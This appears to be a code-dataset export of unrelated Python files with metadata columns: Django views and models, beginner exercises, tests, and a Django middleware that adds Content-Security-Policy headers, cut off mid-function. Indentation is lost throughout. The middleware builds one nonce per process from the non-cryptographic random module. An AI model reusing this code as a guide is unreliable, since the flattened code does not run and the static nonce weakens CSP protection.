@login_required
def profile(request):
'''展示个人资料'''
user = request.user
return render(request, 'users/profile.html', {'user':user})
@login_required
def change_profile(request):
'''更新个人资料'''
if request.method == 'POST':
# instance参数表示用model实例来初始化表单,这样就可以达到通过表单来更新数据
form = ProfileForm(request.POST, instance=request.user)
if form.is_valid():
form.save()
# 添加一条信息,表单验证成功就重定向到个人信息页面
messages.add_message(request, messages.SUCCESS, '个人信息更新成功!')
return redirect('users:profile')
else:
# 不是POST请求就返回空表单
form = ProfileForm(instance=request.user)
return render(request, 'users/change_profile.html', context={'form': form}) | zh | 0.941234 | 展示个人资料 更新个人资料 # instance参数表示用model实例来初始化表单,这样就可以达到通过表单来更新数据 # 添加一条信息,表单验证成功就重定向到个人信息页面 # 不是POST请求就返回空表单 | 2.155741 | 2 |
PYTHON/Objects and data structures/dictionary-demo.py | YakazaSTG/Python-Basics | 0 | 6613987 | <reponame>YakazaSTG/Python-Basics<gh_stars>0
'''
ogrenciler = {
'120': {
'ad': 'Ali',
'soyad': 'Yılmaz',
'telefon': '532 000 00 01'
},
'125': {
'ad': 'Can',
'soyad': 'Korkmaz',
'telefon': '532 000 00 02'
},
'128': {
'ad': 'Volkan',
'soyad': 'Yükselen',
'telefon': '532 000 00 03'
},
}
1- Bilgileri verilen öğrencileri kullanıcıdan aldığınız bilgilerle
dictionary içinde saklayınız.
2- Öğrenci numarasını kullanıcıdan alıp ilgili öğrenci bilgisini gösterin.
'''
ogrenciler = {}
number = input("öğrenci no: ")
name = input("öğrenci adı: ")
surname = input("öğrenci soyad: ")
phone = input("öğrenci telefon ")
# ogrenciler[number] = {
# 'ad': name,
# 'soyad': surname,
# 'telefon': phone
# }
ogrenciler.update({
number: {
'ad': name,
'soyad': surname,
'telefon': phone
}
})
number = input("öğrenci no: ")
name = input("öğrenci adı: ")
surname = input("öğrenci soyad: ")
phone = input("öğrenci telefon ")
ogrenciler.update({
number: {
'ad': name,
'soyad': surname,
'telefon': phone
}
})
number = input("öğrenci no: ")
name = input("öğrenci adı: ")
surname = input("öğrenci soyad: ")
phone = input("öğrenci telefon: ")
ogrenciler.update({
number: {
'ad': name,
'soyad': surname,
'telefon': phone
}
})
print('*'*50)
print(ogrenciler)
ogrNo = input('öğrenci no: ')
ogrenci = ogrenciler[ogrNo]
print(f"Aradığınız {ogrNo} nolu öğrencinin adı: {ogrenci['ad']} soyadı: {ogrenci['soyad']} ve telefonu {ogrenci['telefon']}") | '''
ogrenciler = {
'120': {
'ad': 'Ali',
'soyad': 'Yılmaz',
'telefon': '532 000 00 01'
},
'125': {
'ad': 'Can',
'soyad': 'Korkmaz',
'telefon': '532 000 00 02'
},
'128': {
'ad': 'Volkan',
'soyad': 'Yükselen',
'telefon': '532 000 00 03'
},
}
1- Bilgileri verilen öğrencileri kullanıcıdan aldığınız bilgilerle
dictionary içinde saklayınız.
2- Öğrenci numarasını kullanıcıdan alıp ilgili öğrenci bilgisini gösterin.
'''
ogrenciler = {}
number = input("öğrenci no: ")
name = input("öğrenci adı: ")
surname = input("öğrenci soyad: ")
phone = input("öğrenci telefon ")
# ogrenciler[number] = {
# 'ad': name,
# 'soyad': surname,
# 'telefon': phone
# }
ogrenciler.update({
number: {
'ad': name,
'soyad': surname,
'telefon': phone
}
})
number = input("öğrenci no: ")
name = input("öğrenci adı: ")
surname = input("öğrenci soyad: ")
phone = input("öğrenci telefon ")
ogrenciler.update({
number: {
'ad': name,
'soyad': surname,
'telefon': phone
}
})
number = input("öğrenci no: ")
name = input("öğrenci adı: ")
surname = input("öğrenci soyad: ")
phone = input("öğrenci telefon: ")
ogrenciler.update({
number: {
'ad': name,
'soyad': surname,
'telefon': phone
}
})
print('*'*50)
print(ogrenciler)
ogrNo = input('öğrenci no: ')
ogrenci = ogrenciler[ogrNo]
print(f"Aradığınız {ogrNo} nolu öğrencinin adı: {ogrenci['ad']} soyadı: {ogrenci['soyad']} ve telefonu {ogrenci['telefon']}") | tr | 0.897995 | ogrenciler = { '120': { 'ad': 'Ali', 'soyad': 'Yılmaz', 'telefon': '532 000 00 01' }, '125': { 'ad': 'Can', 'soyad': 'Korkmaz', 'telefon': '532 000 00 02' }, '128': { 'ad': 'Volkan', 'soyad': 'Yükselen', 'telefon': '532 000 00 03' }, } 1- Bilgileri verilen öğrencileri kullanıcıdan aldığınız bilgilerle dictionary içinde saklayınız. 2- Öğrenci numarasını kullanıcıdan alıp ilgili öğrenci bilgisini gösterin. # ogrenciler[number] = { # 'ad': name, # 'soyad': surname, # 'telefon': phone # } | 3.271164 | 3 |
8/solution.py | ofloveandhate/advent_of_code_2020 | 0 | 6613988 | <reponame>ofloveandhate/advent_of_code_2020
def read_data():
with open ('input.txt') as f:
data = f.readlines()
return [d.strip() for d in data]
def write_data(data):
with open('output.txt','w') as f:
for d in data:
f.write(str(d)+'\n')
###
def part1():
data = read_data()
acc = 0
counts = set()
line = 0
while True:
if line in counts:
return acc
instr = data[line]
counts.add(line)
op, val = instr.split()
if op=="nop":
line = line+1
elif op=="acc":
acc = acc+int(val)
line = line+1
elif op=="jmp":
line = line+int(val)
###
def run_that_shit(data):
acc = 0
counts = set()
line = 0
while True:
if line in counts:
raise ValueError("duplicate instruction encountered")
try:
instr = data[line]
except:
return acc
counts.add(line)
op, val = instr.split()
if op=="nop":
line = line+1
elif op=="acc":
acc = acc+int(val)
line = line+1
elif op=="jmp":
line = line+int(val)
return acc
def mod_data(data, line):
modded = data.copy()
instr = data[line]
op, val = instr.split()
print(instr)
if op=='nop':
modded[line] = f"jmp {val}"
elif op=='jmp':
modded[line] = f"nop {val}"
else:
raise ValueError(f"line {line} not a candidate")
return modded
def part2():
data = read_data()
line = 0
while True:
try:
return run_that_shit(mod_data(data,line))
except ValueError as e:
line = line+1
print("part 1: {}".format(part1()))
print("part 2: {}".format(part2()))
| def read_data():
with open ('input.txt') as f:
data = f.readlines()
return [d.strip() for d in data]
def write_data(data):
with open('output.txt','w') as f:
for d in data:
f.write(str(d)+'\n')
###
def part1():
data = read_data()
acc = 0
counts = set()
line = 0
while True:
if line in counts:
return acc
instr = data[line]
counts.add(line)
op, val = instr.split()
if op=="nop":
line = line+1
elif op=="acc":
acc = acc+int(val)
line = line+1
elif op=="jmp":
line = line+int(val)
###
def run_that_shit(data):
acc = 0
counts = set()
line = 0
while True:
if line in counts:
raise ValueError("duplicate instruction encountered")
try:
instr = data[line]
except:
return acc
counts.add(line)
op, val = instr.split()
if op=="nop":
line = line+1
elif op=="acc":
acc = acc+int(val)
line = line+1
elif op=="jmp":
line = line+int(val)
return acc
def mod_data(data, line):
modded = data.copy()
instr = data[line]
op, val = instr.split()
print(instr)
if op=='nop':
modded[line] = f"jmp {val}"
elif op=='jmp':
modded[line] = f"nop {val}"
else:
raise ValueError(f"line {line} not a candidate")
return modded
def part2():
data = read_data()
line = 0
while True:
try:
return run_that_shit(mod_data(data,line))
except ValueError as e:
line = line+1
print("part 1: {}".format(part1()))
print("part 2: {}".format(part2())) | none | 1 | 3.369952 | 3 | |
module_question/models.py | NicolasMuras/Lookdaluv | 1 | 6613989 | from django.db import models
from simple_history.models import HistoricalRecords
from core.models import BaseModel
from modules.models import Module
class QuestionModule(Module):
class Difficult(models.IntegerChoices):
VERY_EASY = 1, "Very Easy"
EASY = 2, "Easy"
MEDIUM = 3, "Medium"
HARD = 4, "Hard"
VERY_HARD = 5, "Very Hard"
NIGHTMARE = 6, "Nightmare"
difficult = models.PositiveSmallIntegerField(
'Difficult',
choices=Difficult.choices,
default=Difficult.MEDIUM
)
level_steps = models.IntegerField(default=10)
historical = HistoricalRecords()
@property
def _history_user(self):
return self.changed_by
@_history_user.setter
def _history_user(self, value):
self.changed_by = value
class Meta:
verbose_name = 'Question Module'
verbose_name_plural = 'Question Modules'
def __str__(self):
return self.title
class QuestionModuleStatistics(BaseModel):
module = models.ForeignKey(QuestionModule, on_delete=models.CASCADE, verbose_name='Module', related_name='statistics')
completed = models.BooleanField(blank=False, null=False, default=False)
max_step_reached = models.IntegerField(default=1)
value_generated = models.IntegerField(default=1)
trap_passed = models.BooleanField(blank=True, null=False, default=False)
historical = HistoricalRecords()
@property
def _history_user(self):
return self.changed_by
@_history_user.setter
def _history_user(self, value):
self.changed_by = value
class Meta:
verbose_name = 'Question Statistic'
verbose_name_plural = 'Question Statistics'
def __str__(self):
return self.module.title | from django.db import models
from simple_history.models import HistoricalRecords
from core.models import BaseModel
from modules.models import Module
class QuestionModule(Module):
class Difficult(models.IntegerChoices):
VERY_EASY = 1, "Very Easy"
EASY = 2, "Easy"
MEDIUM = 3, "Medium"
HARD = 4, "Hard"
VERY_HARD = 5, "Very Hard"
NIGHTMARE = 6, "Nightmare"
difficult = models.PositiveSmallIntegerField(
'Difficult',
choices=Difficult.choices,
default=Difficult.MEDIUM
)
level_steps = models.IntegerField(default=10)
historical = HistoricalRecords()
@property
def _history_user(self):
return self.changed_by
@_history_user.setter
def _history_user(self, value):
self.changed_by = value
class Meta:
verbose_name = 'Question Module'
verbose_name_plural = 'Question Modules'
def __str__(self):
return self.title
class QuestionModuleStatistics(BaseModel):
module = models.ForeignKey(QuestionModule, on_delete=models.CASCADE, verbose_name='Module', related_name='statistics')
completed = models.BooleanField(blank=False, null=False, default=False)
max_step_reached = models.IntegerField(default=1)
value_generated = models.IntegerField(default=1)
trap_passed = models.BooleanField(blank=True, null=False, default=False)
historical = HistoricalRecords()
@property
def _history_user(self):
return self.changed_by
@_history_user.setter
def _history_user(self, value):
self.changed_by = value
class Meta:
verbose_name = 'Question Statistic'
verbose_name_plural = 'Question Statistics'
def __str__(self):
return self.module.title | none | 1 | 2.110477 | 2 | |
foodshare/keyboards/digit_list.py | Cocopyth/foodshare | 0 | 6613990 | <gh_stars>0
from telegram import InlineKeyboardButton
from foodshare.utils import emojize_number
digits_layout = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
digit_buttons = [
[
InlineKeyboardButton(emojize_number(x), callback_data=str(x))
for x in row
]
for row in digits_layout
]
| from telegram import InlineKeyboardButton
from foodshare.utils import emojize_number
digits_layout = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
digit_buttons = [
[
InlineKeyboardButton(emojize_number(x), callback_data=str(x))
for x in row
]
for row in digits_layout
] | none | 1 | 2.3679 | 2 | |
Ninja/rename_script.py | cyandterry/Python-Study | 61 | 6613991 | <gh_stars>10-100
#!/usr/bin/env python
import json
import glob
import os
from question_names import LARGE_JSON_STRING
"""
This is a script that I used to rename the filenames from no index to with index.
"""
if __name__ == '__main__':
leetcode_data = json.loads(LARGE_JSON_STRING)
questions = leetcode_data['stat_status_pairs']
name_to_num_dict = {}
for q in questions:
name_to_num_dict[q['stat']['question__title']] = q['stat']['question_id']
file_list = glob.glob('./Leetcode/*.py')
cannot_finish = []
for file in file_list:
filename = file.split('/')[-1].split('.')[0]
question_name = filename.replace('_', ' ')
if question_name in name_to_num_dict:
num = name_to_num_dict[question_name]
new_file_name = "./Leetcode/" + str(num) + '_' + filename + ".py"
# print(new_file_name)
# os.rename(file, new_file_name)
else:
cannot_finish.append(question_name)
print('*'*100)
print(cannot_finish)
| #!/usr/bin/env python
import json
import glob
import os
from question_names import LARGE_JSON_STRING
"""
This is a script that I used to rename the filenames from no index to with index.
"""
if __name__ == '__main__':
leetcode_data = json.loads(LARGE_JSON_STRING)
questions = leetcode_data['stat_status_pairs']
name_to_num_dict = {}
for q in questions:
name_to_num_dict[q['stat']['question__title']] = q['stat']['question_id']
file_list = glob.glob('./Leetcode/*.py')
cannot_finish = []
for file in file_list:
filename = file.split('/')[-1].split('.')[0]
question_name = filename.replace('_', ' ')
if question_name in name_to_num_dict:
num = name_to_num_dict[question_name]
new_file_name = "./Leetcode/" + str(num) + '_' + filename + ".py"
# print(new_file_name)
# os.rename(file, new_file_name)
else:
cannot_finish.append(question_name)
print('*'*100)
print(cannot_finish) | en | 0.819835 | #!/usr/bin/env python This is a script that I used to rename the filenames from no index to with index. # print(new_file_name) # os.rename(file, new_file_name) | 3.212963 | 3 |
jwql/tests/test_cosmic_ray_monitor.py | mengesser/jwql | 0 | 6613992 | <reponame>mengesser/jwql
#! /usr/bin/env python
"""Tests for the cosmic ray monitor module.
Authors
-------
- <NAME>
Use
---
These tests can be run via the command line (omit the ``-s`` to
suppress verbose output to stdout):
::
pytest -s test_cosmic_ray_monitor.py
"""
# Third Party Imports
from astropy.io import fits
import numpy as np
import pytest
# Local Imports
from cosmic_ray_monitor import Cosmic_Ray
from jwql.database.database_interface import MIRICosmicRayQueryHistory
def define_test_data(nints):
if nints == 1:
data = np.ones((2, 5, 10, 10))
rate_data = np.ones((10, 10))
else:
data = np.ones((2, 5, 10, 10))
rate_data = np.ones((2, 10, 10))
file = "jw00000000000_00000_00000_MIRIMAGE_uncal.fits"
aperture = "MIRIM_FULL"
return data, rate_data, file, aperture
def test_get_jump_data():
_ = define_test_data(2)
file = _[2]
head, data, dq = Cosmic_Ray.get_jump_data(file)
assert type(head) == fits.header.Header
assert type(data) == np.ndarray
assert type(dq) == np.ndarray
def test_get_rate_data():
_ = define_test_data(1)
file = _[2]
data = Cosmic_Ray.get_rate_data(file)
assert type(data) == np.ndarray
def test_get_cr_rate():
jump_locs = np.arange(100).tolist()
t = 5
rate = Cosmic_Ray.get_cr_rate(jump_locs, t)
assert rate == 20.0
def test_group_before():
jump_locs = [(2, 1, 1)]
nints = 1
assert Cosmic_Ray.group_before(jump_locs, nints) == [(1, 1, 1)]
jump_locs = [(1, 2, 1, 1)]
nints = 2
assert Cosmic_Ray.group_before(jump_locs, nints) == [(1, 1, 1, 1)]
def test_magnitude():
nints = 5
data, rate_data, file, aperture = define_test_data(nints)
head = fits.getheader(file)
coord = (1, 2, 1, 1)
coord_gb = (1, 1, 1, 1)
mag = Cosmic_Ray.magnitude(coord, coord_gb, rate_data, data, head, nints)
assert mag == -2.77504
nints = 1
data, rate_data, file, aperture = define_test_data(nints)
coord = (1, 1, 1)
coord_gb = (0, 1, 1)
mag = Cosmic_Ray.magnitude(coord, coord_gb, rate_data, data, head, nints)
assert mag == -2.77504
def test_get_cr_mags():
jump_locs = [(2, 1, 1)]
jump_locs_pre = [(1, 1, 1)]
nints = 1
data, rate_data, file, aperture = define_test_data(nints)
head = fits.getheader(file)
mags = Cosmic_Ray.get_cr_mags(jump_locs, jump_locs_pre, rate_data, data, head, nints)
assert mags == [-2.77504]
jump_locs = [(1, 2, 1, 1)]
jump_locs_pre = [(1, 1, 1, 1)]
nints = 5
data, rate_data, file, aperture = define_test_data(nints)
mags = Cosmic_Ray.get_cr_mags(jump_locs, jump_locs_pre, rate_data, data, head, nints)
assert mags == [-2.77504]
def test_most_recent_search():
_ = define_test_data(1)
aperture = _[3]
query_table = MIRICosmicRayQueryHistory
result = Cosmic_Ray.most_recent_search(aperture,query_table)
assert result == 57357.0
def test_query_mast():
start_date = 57357.0
end_date = 57405.0
result = Cosmic_Ray.query_mast(start_date, end_date)
assert len(result) == 5
| #! /usr/bin/env python
"""Tests for the cosmic ray monitor module.
Authors
-------
- <NAME>
Use
---
These tests can be run via the command line (omit the ``-s`` to
suppress verbose output to stdout):
::
pytest -s test_cosmic_ray_monitor.py
"""
# Third Party Imports
from astropy.io import fits
import numpy as np
import pytest
# Local Imports
from cosmic_ray_monitor import Cosmic_Ray
from jwql.database.database_interface import MIRICosmicRayQueryHistory
def define_test_data(nints):
if nints == 1:
data = np.ones((2, 5, 10, 10))
rate_data = np.ones((10, 10))
else:
data = np.ones((2, 5, 10, 10))
rate_data = np.ones((2, 10, 10))
file = "jw00000000000_00000_00000_MIRIMAGE_uncal.fits"
aperture = "MIRIM_FULL"
return data, rate_data, file, aperture
def test_get_jump_data():
_ = define_test_data(2)
file = _[2]
head, data, dq = Cosmic_Ray.get_jump_data(file)
assert type(head) == fits.header.Header
assert type(data) == np.ndarray
assert type(dq) == np.ndarray
def test_get_rate_data():
_ = define_test_data(1)
file = _[2]
data = Cosmic_Ray.get_rate_data(file)
assert type(data) == np.ndarray
def test_get_cr_rate():
jump_locs = np.arange(100).tolist()
t = 5
rate = Cosmic_Ray.get_cr_rate(jump_locs, t)
assert rate == 20.0
def test_group_before():
jump_locs = [(2, 1, 1)]
nints = 1
assert Cosmic_Ray.group_before(jump_locs, nints) == [(1, 1, 1)]
jump_locs = [(1, 2, 1, 1)]
nints = 2
assert Cosmic_Ray.group_before(jump_locs, nints) == [(1, 1, 1, 1)]
def test_magnitude():
nints = 5
data, rate_data, file, aperture = define_test_data(nints)
head = fits.getheader(file)
coord = (1, 2, 1, 1)
coord_gb = (1, 1, 1, 1)
mag = Cosmic_Ray.magnitude(coord, coord_gb, rate_data, data, head, nints)
assert mag == -2.77504
nints = 1
data, rate_data, file, aperture = define_test_data(nints)
coord = (1, 1, 1)
coord_gb = (0, 1, 1)
mag = Cosmic_Ray.magnitude(coord, coord_gb, rate_data, data, head, nints)
assert mag == -2.77504
def test_get_cr_mags():
jump_locs = [(2, 1, 1)]
jump_locs_pre = [(1, 1, 1)]
nints = 1
data, rate_data, file, aperture = define_test_data(nints)
head = fits.getheader(file)
mags = Cosmic_Ray.get_cr_mags(jump_locs, jump_locs_pre, rate_data, data, head, nints)
assert mags == [-2.77504]
jump_locs = [(1, 2, 1, 1)]
jump_locs_pre = [(1, 1, 1, 1)]
nints = 5
data, rate_data, file, aperture = define_test_data(nints)
mags = Cosmic_Ray.get_cr_mags(jump_locs, jump_locs_pre, rate_data, data, head, nints)
assert mags == [-2.77504]
def test_most_recent_search():
_ = define_test_data(1)
aperture = _[3]
query_table = MIRICosmicRayQueryHistory
result = Cosmic_Ray.most_recent_search(aperture,query_table)
assert result == 57357.0
def test_query_mast():
start_date = 57357.0
end_date = 57405.0
result = Cosmic_Ray.query_mast(start_date, end_date)
assert len(result) == 5 | en | 0.539988 | #! /usr/bin/env python Tests for the cosmic ray monitor module. Authors ------- - <NAME> Use --- These tests can be run via the command line (omit the ``-s`` to suppress verbose output to stdout): :: pytest -s test_cosmic_ray_monitor.py # Third Party Imports # Local Imports | 2.32723 | 2 |
csp_observer/middleware.py | flxn/django-csp-observer | 1 | 6613993 | <filename>csp_observer/middleware.py
import re
import logging
import json
import base64
import uuid
import asyncio
import random
from django.urls import reverse
from . import settings as app_settings
from .models import Session
from django.template.loader import render_to_string
from django.templatetags.static import static
from .report_handlers import REPORT_TYPE_CSP, REPORT_TYPE_TRIPWIRE
from .remote import create_master_session
class CspReportMiddleware:
"""The main middleware that handles all of CSP-Observer's business logic."""
def __init__(self, get_response):
self.super_get_response = get_response
self.logger = logger = logging.getLogger(__name__)
self.reporting_group_name = "csp-observer"
self.csp_header_name = "Content-Security-Policy"
if app_settings.REPORT_ONLY:
self.csp_header_name = "Content-Security-Policy-Report-Only"
# compile regexes for all enabled paths
self.paths_regex = [re.compile("^{}$".format(p)) for p in app_settings.ENABLED_PATHS]
nonce_temp = ''
# generate random lower case string
for _ in range(10):
random_int = random.randint(97, 122)
nonce_temp += chr(random_int)
self.nonce = nonce_temp
def get_response(self, request):
response = self.super_get_response(request)
if app_settings.IS_MASTER_COLLECTOR:
response = self.add_cors_header(request, response)
return response
def anonymize_ip(self, ip_address):
"""Removes the last two octets from the ip_address."""
return ".".join(ip_address.split(".")[:2] + 2*["0"])
def create_session(self, request):
"""Creates a new session object, stores it in the database and returns the session id."""
session = Session(
user_agent=request.META["HTTP_USER_AGENT"],
anonymized_ip=self.anonymize_ip(request.META["REMOTE_ADDR"])
)
session.save()
self.logger.debug("session created: {}".format(session.id))
return session.id
def get_csp_policy(self, request, session_id):
"""Returns the CSP policy string based on the current settings."""
if app_settings.REMOTE_REPORTING:
report_uri = "{}/report/{}/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, REPORT_TYPE_CSP, session_id)
else:
report_uri = request.build_absolute_uri(reverse('report', args=(REPORT_TYPE_CSP, session_id, )))
# set fallback reporting directive
middleware_directives = {
'report-uri': [report_uri],
'script-src': ["'nonce-{}'".format(self.nonce)],
'style-src': ["'nonce-{}'".format(self.nonce)],
'default-src': ["'nonce-{}'".format(self.nonce)],
}
if app_settings.REMOTE_REPORTING:
middleware_directives['connect-src'] = [app_settings.REMOTE_CSP_OBSERVER_URL + "/"]
# New Reporting API stuff (not working?!):
# https://w3c.github.io/reporting/
# response["Reporting-Endpoints"] = '{}="{}"'.format(self.reporting_group_name, report_uri)
report_to_group_definition = {
"group": self.reporting_group_name,
"max_age": 86400,
"include_subdomains": True,
"endpoints": [{
"url": report_uri,
}]
}
if app_settings.USE_NEW_API:
middleware_directives['report-to'] = [self.reporting_group_name]
response["Report-To"] = json.dumps(report_to_group_definition)
# merge custom csp policy from settings with required middleware directives
final_csp_policy = app_settings.CSP_POLICIES
for directive, values in middleware_directives.items():
if directive in final_csp_policy and directive != 'report-uri':
final_csp_policy[directive] = set(list(final_csp_policy[directive]) + list(values))
else:
final_csp_policy[directive] = values
# build csp header string
csp_policy_string = ""
for directive, values in final_csp_policy.items():
csp_policy_string += "{} {}; ".format(directive, " ".join(values))
return csp_policy_string
def add_csp_header(self, request, response, session_id):
"""Adds the CSP header to the response."""
policy = self.get_csp_policy(request, session_id)
response[self.csp_header_name] = policy
return response
def add_cors_header(self, request, response):
"""Adds the CORS headers required for master reporting instances."""
origins = ' '.join(app_settings.AUTHORIZED_REPORTERS)
if 'Access-Control-Allow-Origin' in response:
origins = response['Access-Control-Allow-Origin'] + ' ' + origins
response['Access-Control-Allow-Origin'] = origins
if 'Access-Control-Request-Headers' in request.headers:
response['Access-Control-Allow-Headers'] = request.headers['Access-Control-Request-Headers']
return response
def add_tripwire(self, request, response, session_id):
"""Injects the tripwire javascript component into HTML response."""
tripwire_js_path = static('csp_observer/js/tripwire.js')
tripwire_js_uri = request.build_absolute_uri(tripwire_js_path)
policy = self.get_csp_policy(request, session_id)
policy_b64 = base64.b64encode(str.encode(policy)).decode()
if app_settings.REMOTE_REPORTING:
tripwire_report_uri = "{}/report/{}/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, REPORT_TYPE_TRIPWIRE, session_id)
else:
tripwire_report_uri = request.build_absolute_uri(reverse('report', args=(REPORT_TYPE_TRIPWIRE, session_id, )))
script_tag_string = '<script type="text/javascript" data-session="{}" data-policy="{}" data-report-uri="{}" src="{}"></script>'.format(
session_id,
policy_b64,
tripwire_report_uri,
tripwire_js_uri
)
response.content = response.content.replace(b'</body>', str.encode(script_tag_string + '</body>'))
return response
def add_script_nonce(self, request, response):
"""Injects nonce attribute into all script tags in HTML response."""
nonce_script_tag = '<script nonce="{}"'.format(self.nonce)
response.content = response.content.replace(b'<script', str.encode(nonce_script_tag))
return response
def add_style_nonce(self, request, response):
"""Injects nonce attribute into all style and link tags in HTML response."""
nonce_style_tag = '<style nonce="{}"'.format(self.nonce)
response.content = response.content.replace(b'<style', str.encode(nonce_style_tag))
nonce_link_tag = '<link nonce="{}"'.format(self.nonce)
response.content = response.content.replace(b'<link', str.encode(nonce_link_tag))
return response
def add_clientui(self, request, response, session_id):
"""Injects the clientui javascript component, responsible for the popup dialog, into HTML response."""
if app_settings.REMOTE_REPORTING:
result_uri = "{}/result/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, session_id)
detailpage_uri = "{}/resultdetail/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, session_id)
else:
result_uri = request.build_absolute_uri(reverse('result', args=(session_id, )))
detailpage_uri = request.build_absolute_uri(reverse('result_detail', args=(session_id, )))
clientui_html = render_to_string("client_ui/popup.html", {
'session_id': session_id,
'visibility': app_settings.CLIENTUI_VISIBILITY,
'result_uri': result_uri,
'detailpage_uri': detailpage_uri
})
response.content = response.content.replace(b'</body>', str.encode(clientui_html + '</body>'))
return response
def __call__(self, request):
"""Checks current request path to decide if it should be observed or not."""
# check if path in enabled paths
for path_regex in self.paths_regex:
if path_regex.match(request.path):
self.logger.debug("match for path {}".format(request.path))
if app_settings.REMOTE_REPORTING:
session_id = str(uuid.uuid4())
self.logger.debug("creating remote session {}".format(session_id))
asyncio.run(create_master_session(request, session_id))
else:
session_id = self.create_session(request)
request.cspo_session_id = session_id
response = self.get_response(request)
response = self.add_csp_header(request, response, session_id)
response = self.add_tripwire(request, response, session_id)
response = self.add_clientui(request, response, session_id)
if app_settings.USE_SCRIPT_NONCE:
response = self.add_script_nonce(request, response)
if app_settings.USE_STYLE_NONCE:
response = self.add_style_nonce(request, response)
return response
return self.get_response(request) | <filename>csp_observer/middleware.py
import re
import logging
import json
import base64
import uuid
import asyncio
import random
from django.urls import reverse
from . import settings as app_settings
from .models import Session
from django.template.loader import render_to_string
from django.templatetags.static import static
from .report_handlers import REPORT_TYPE_CSP, REPORT_TYPE_TRIPWIRE
from .remote import create_master_session
class CspReportMiddleware:
"""The main middleware that handles all of CSP-Observer's business logic."""
def __init__(self, get_response):
self.super_get_response = get_response
self.logger = logger = logging.getLogger(__name__)
self.reporting_group_name = "csp-observer"
self.csp_header_name = "Content-Security-Policy"
if app_settings.REPORT_ONLY:
self.csp_header_name = "Content-Security-Policy-Report-Only"
# compile regexes for all enabled paths
self.paths_regex = [re.compile("^{}$".format(p)) for p in app_settings.ENABLED_PATHS]
nonce_temp = ''
# generate random lower case string
for _ in range(10):
random_int = random.randint(97, 122)
nonce_temp += chr(random_int)
self.nonce = nonce_temp
def get_response(self, request):
response = self.super_get_response(request)
if app_settings.IS_MASTER_COLLECTOR:
response = self.add_cors_header(request, response)
return response
def anonymize_ip(self, ip_address):
"""Removes the last two octets from the ip_address."""
return ".".join(ip_address.split(".")[:2] + 2*["0"])
def create_session(self, request):
"""Creates a new session object, stores it in the database and returns the session id."""
session = Session(
user_agent=request.META["HTTP_USER_AGENT"],
anonymized_ip=self.anonymize_ip(request.META["REMOTE_ADDR"])
)
session.save()
self.logger.debug("session created: {}".format(session.id))
return session.id
def get_csp_policy(self, request, session_id):
"""Returns the CSP policy string based on the current settings."""
if app_settings.REMOTE_REPORTING:
report_uri = "{}/report/{}/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, REPORT_TYPE_CSP, session_id)
else:
report_uri = request.build_absolute_uri(reverse('report', args=(REPORT_TYPE_CSP, session_id, )))
# set fallback reporting directive
middleware_directives = {
'report-uri': [report_uri],
'script-src': ["'nonce-{}'".format(self.nonce)],
'style-src': ["'nonce-{}'".format(self.nonce)],
'default-src': ["'nonce-{}'".format(self.nonce)],
}
if app_settings.REMOTE_REPORTING:
middleware_directives['connect-src'] = [app_settings.REMOTE_CSP_OBSERVER_URL + "/"]
# New Reporting API stuff (not working?!):
# https://w3c.github.io/reporting/
# response["Reporting-Endpoints"] = '{}="{}"'.format(self.reporting_group_name, report_uri)
report_to_group_definition = {
"group": self.reporting_group_name,
"max_age": 86400,
"include_subdomains": True,
"endpoints": [{
"url": report_uri,
}]
}
if app_settings.USE_NEW_API:
middleware_directives['report-to'] = [self.reporting_group_name]
response["Report-To"] = json.dumps(report_to_group_definition)
# merge custom csp policy from settings with required middleware directives
final_csp_policy = app_settings.CSP_POLICIES
for directive, values in middleware_directives.items():
if directive in final_csp_policy and directive != 'report-uri':
final_csp_policy[directive] = set(list(final_csp_policy[directive]) + list(values))
else:
final_csp_policy[directive] = values
# build csp header string
csp_policy_string = ""
for directive, values in final_csp_policy.items():
csp_policy_string += "{} {}; ".format(directive, " ".join(values))
return csp_policy_string
def add_csp_header(self, request, response, session_id):
"""Adds the CSP header to the response."""
policy = self.get_csp_policy(request, session_id)
response[self.csp_header_name] = policy
return response
def add_cors_header(self, request, response):
"""Adds the CORS headers required for master reporting instances."""
origins = ' '.join(app_settings.AUTHORIZED_REPORTERS)
if 'Access-Control-Allow-Origin' in response:
origins = response['Access-Control-Allow-Origin'] + ' ' + origins
response['Access-Control-Allow-Origin'] = origins
if 'Access-Control-Request-Headers' in request.headers:
response['Access-Control-Allow-Headers'] = request.headers['Access-Control-Request-Headers']
return response
def add_tripwire(self, request, response, session_id):
"""Injects the tripwire javascript component into HTML response."""
tripwire_js_path = static('csp_observer/js/tripwire.js')
tripwire_js_uri = request.build_absolute_uri(tripwire_js_path)
policy = self.get_csp_policy(request, session_id)
policy_b64 = base64.b64encode(str.encode(policy)).decode()
if app_settings.REMOTE_REPORTING:
tripwire_report_uri = "{}/report/{}/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, REPORT_TYPE_TRIPWIRE, session_id)
else:
tripwire_report_uri = request.build_absolute_uri(reverse('report', args=(REPORT_TYPE_TRIPWIRE, session_id, )))
script_tag_string = '<script type="text/javascript" data-session="{}" data-policy="{}" data-report-uri="{}" src="{}"></script>'.format(
session_id,
policy_b64,
tripwire_report_uri,
tripwire_js_uri
)
response.content = response.content.replace(b'</body>', str.encode(script_tag_string + '</body>'))
return response
def add_script_nonce(self, request, response):
"""Injects nonce attribute into all script tags in HTML response."""
nonce_script_tag = '<script nonce="{}"'.format(self.nonce)
response.content = response.content.replace(b'<script', str.encode(nonce_script_tag))
return response
def add_style_nonce(self, request, response):
"""Injects nonce attribute into all style and link tags in HTML response."""
nonce_style_tag = '<style nonce="{}"'.format(self.nonce)
response.content = response.content.replace(b'<style', str.encode(nonce_style_tag))
nonce_link_tag = '<link nonce="{}"'.format(self.nonce)
response.content = response.content.replace(b'<link', str.encode(nonce_link_tag))
return response
def add_clientui(self, request, response, session_id):
"""Injects the clientui javascript component, responsible for the popup dialog, into HTML response."""
if app_settings.REMOTE_REPORTING:
result_uri = "{}/result/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, session_id)
detailpage_uri = "{}/resultdetail/{}".format(app_settings.REMOTE_CSP_OBSERVER_URL, session_id)
else:
result_uri = request.build_absolute_uri(reverse('result', args=(session_id, )))
